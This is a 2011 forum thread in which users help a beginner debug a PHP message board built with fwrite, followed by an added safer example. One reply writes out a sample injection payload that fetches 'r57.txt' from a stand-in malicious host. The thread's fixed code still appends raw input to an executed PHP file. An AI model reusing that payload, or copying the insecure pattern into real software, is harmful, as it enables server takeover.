Problem with php fwrite()

Post by Reason7194 on Tue Mar 29, 2011 4:43 pm

Hello everyone, what I am trying to do with fwrite() is use it to post a message onto an "update board" that I have on my website. However, I am coming up with an error saying "Fatal error: Function name must be a string" on line 17 of my syntax. At this point, I am unable to solve this issue. If anyone could give me a push in the correct direction, that would be very helpful.

The PHP (it is PHP mixed with HTML) code I need help with:

    <?php include("Links.php");
    $message = $_POST('Message');

    $fw = fopen("supported.php","a");

    fwrite($fw,'$message');


    if(isset($message))
    //If the forum is filled out send the message.
    {

    $Message = $_POST['Message'];
    fwrite('$fw','$Message');

    }
    else  // If the post is not filled out display the post area.

    {

    echo " <form method='post' action='support.php'>
    <center>
    <br>
    <br>
      Username:<input name='username' type='text' /><br />
      Message:<br />
      <textarea name='message' rows='15' cols='40'>
      </textarea><br />
      <input type='submit' />
    </center>
      </form>";



This is my first attempt at using fwrite() and fopen(), so please feel free to tell me if I have done something horribly wrong, as well as with my original problem.

-- Tue Mar 29, 2011 4:18 pm --

Ah, the problem was that I was using " ( " instead of " [ ".

Another problem arises though, when a person enters a message, the 'message' that the user sent is viewed as "$message". The syntax prints out $message, not what the variable was holding. Why?

Post by Goatboy on Tue Mar 29, 2011 4:55 pm

In response to your second post, it's because there is a difference between single and double quotes. Code:

<?php

$message = "Hello, world!";

echo $message;     // Hello, world!
echo "$message";   // Hello, world!
echo '$message';   // $message
echo "'$message'"; // 'Hello, world!'
echo '"$message"'; // "$message"

?>

Single quotes are taken literally, and double quotes are parsed for variables.

Post by OnlyHuman on Tue Mar 29, 2011 5:10 pm

Alright, I took a shot at rewriting this. It should function now. I haven't tested it, but it should work.

<?php

   include("Links.php");

   if( isset($_POST['Message']) && ($_POST['Message'] != null) )
   {
      $message = $_POST['Message'];

      $fp = fopen("support.php","a");

      // no quotes here: Solves the problem of '$message' being
      // written to the file instead of the actual message content
      fwrite($fp, $message);

      fclose($fp);
   }

   echo "<form method='post' action='support.php'><center><br /><br />Username:<input name='username' type='text' /><br />Message:<br /><textarea name='message' rows='15' cols='40'></textarea><br /><input type='submit' /></center></form>";

?>

But, this is still really insecure code. Don't take that the wrong way. You're learning, it's cool. The main problem I see though, is that you're using the form action as the same file to store the content of the message. That file is called and rendered by your CGI backend every time that form is submitted. If I were to make my message something like <?php phpinfo(); ?> or <?php echo file_get_contents("http://www.malicious-host.foo/r57.txt"); ?>, I could totally own your server. It would be better to store the messages into a separate file, or a database, and then filter it before it gets rendered.

Post by Reason7194 on Tue Mar 29, 2011 5:29 pm

Oh dear, well let us hope that you won't do that.

Thank you both for answering my 2nd question and for cleaning my code. On a different question, why does the message that the user sends want to go to a URL instead of the file that I want it to go to? 'It' wants to go to the URL support.php, but that does not exist. I actually wanted it to go to the file called support.php.
Last edited by Reason7194 on Tue Mar 29, 2011 6:07 pm, edited 2 times in total.

Post by Goatboy on Tue Mar 29, 2011 5:45 pm

I'm not sure I understand your question. The reason for this behavior is probably because the file that you are writing to is the same one you are using to both display and process the form. Use one form to display and process the form, and write messages to a separate file.

Post by Reason7194 on Tue Mar 29, 2011 6:14 pm

If I understand correctly, I do believe I am using two different files to process and display the message.

After editing the code, I am now opening a different file called "contact.php" and using that to display. I left "support.php" in the form area to be used as the process. There is still the same error, "requested url is not found".

Post by Goatboy on Tue Mar 29, 2011 6:15 pm

Try changing the file extension on the file you are writing to. If that doesn't work, check your permissions.

Post by OnlyHuman on Tue Mar 29, 2011 6:21 pm

Reason7194 wrote: If I understand correctly, I do believe I am using two different files to process and display the message.

Yes, the two separate files are part of the problem. Another is the form action itself. It's set to call the file 'support.php' but the file that's calling it is using its variables. That effectively gives both files access to separate variables that just happen to have the same names. But, only one of them is currently using them. And, if 'support.php' doesn't exist, your server will issue a 404 (your "not found" error).

All these issues can be fixed pretty simply, either by creating that file, and using the variables locally, or by altering the code slightly. This is just the same code I sent you a moment ago, but I'm posting it here as well for completeness. Check this out.

<?php

   include("Links.php");

   // FIXED: Case sensitivity mismatch in original $_POST['message'].
   if( isset($_POST['message']) && ($_POST['message'] != null) )
   {
      // this should actually be filtered as well
      $message = $_POST['message'];

      $fp = fopen("support.php","a");

      // no quotes here: Solves the problem of '$message' being
      // written to the file instead of the actual message content
      fwrite($fp, $message);

      fclose($fp);
   }

   // form action is now THIS file
   echo "<form method='post' action=''><center><br /><br />Username:<input name='username' type='text' /><br />Message:<br /><textarea name='message' rows='15' cols='40'></textarea><br /><input type='submit' /></center></form>";

   // now to render the contents of support.php
   $fp = fopen("support.php","r");

   while( !feof($fp) )
   {
      $line = fgets($fp);

      $text = special_filter_function_defined_elsewhere($line);

      echo $text;
   }

   fclose($fp);

?>

That's a little bit better without actually defining what would be the perfect method for filtering user input. I left that function undefined, because there are a few ways to do it. And to secure something like what you're building here, it will most likely involve something custom. For instance, placing quotes around each line of the file, so that they're written as text, instead of interpreted as code, would help. But I'm sure there are other ways.

Post by Reason7194 on Tue Mar 29, 2011 6:30 pm

It works! Thank you all for your assistance!

Post by OnlyHuman on Wed Mar 30, 2011 3:00 am

Reason7194 wrote: It works! Thank you all for your assistance!

Hey, no problem.

Now it's just a matter of sanitizing the user input. For basic code injection, you could probably get away with using htmlentities or htmlspecialchars. Which are going to be far easier to use than any method based on what I mentioned before. In fact, just forget the whole quoted string thing. I wrote it when I was tired, it was based on something I was kind of halfassing at the moment, and I've slept since then. There's even a small filtering API, with a handful of functions that could prove useful. People can go in circles about the best one to use, and the best way to use them. For example, do you use htmlentities before placing data into a database, when first collecting input from the user, or right before you render output? Some prefer to scrap all of the standard filtering mechanisms and write their own. Whichever method works best for the implementation is probably your best bet though.
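Editor's added example, not code posted by anyone in this thread: one way to combine the two recommendations made above, storing messages in a separate data file that the server never runs as PHP and escaping them with htmlspecialchars when they are rendered. The form field names `username` and `message` come from the thread; `MESSAGE_FILE`, `MAX_MESSAGE_BYTES`, `save_message()` and `render_messages()` are hypothetical, and the `data/` directory is assumed to exist, be writable by PHP, and sit outside the web root.

```php
<?php
// Added example, not from the thread; constant and function names are hypothetical.
// The data file has a non-executable extension, so appended text is never run as PHP.
const MESSAGE_FILE = __DIR__ . '/../data/messages.jsonl';
const MAX_MESSAGE_BYTES = 2000;

function save_message($file, $username, $message)
{
    // Reject arrays (message[]=x) and other non-string input up front.
    if (!is_string($username) || !is_string($message)) {
        return false;
    }
    $username = trim($username);
    $message  = trim($message);
    if ($username === '' || $message === '' || strlen($message) > MAX_MESSAGE_BYTES) {
        return false;
    }
    // One JSON object per line. json_encode() escapes newlines, so a message
    // cannot forge extra records; it returns false on invalid UTF-8.
    $record = json_encode(['user' => $username, 'text' => $message, 'time' => time()]);
    return $record !== false
        && file_put_contents($file, $record . "\n", FILE_APPEND | LOCK_EX) !== false;
}

function render_messages($file)
{
    if (!is_readable($file)) {
        return '';
    }
    $html = '';
    foreach (file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $rec = json_decode($line, true);
        if (!is_array($rec) || !is_string($rec['user'] ?? null) || !is_string($rec['text'] ?? null)) {
            continue; // skip damaged lines instead of echoing them raw
        }
        // Escape at output time so stored text is displayed, never interpreted as markup.
        $user = htmlspecialchars($rec['user'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $text = htmlspecialchars($rec['text'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $html .= "<p><strong>{$user}</strong>: " . nl2br($text) . "</p>\n";
    }
    return $html;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    save_message(MESSAGE_FILE, $_POST['username'] ?? null, $_POST['message'] ?? null);
}
echo render_messages(MESSAGE_FILE);
```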


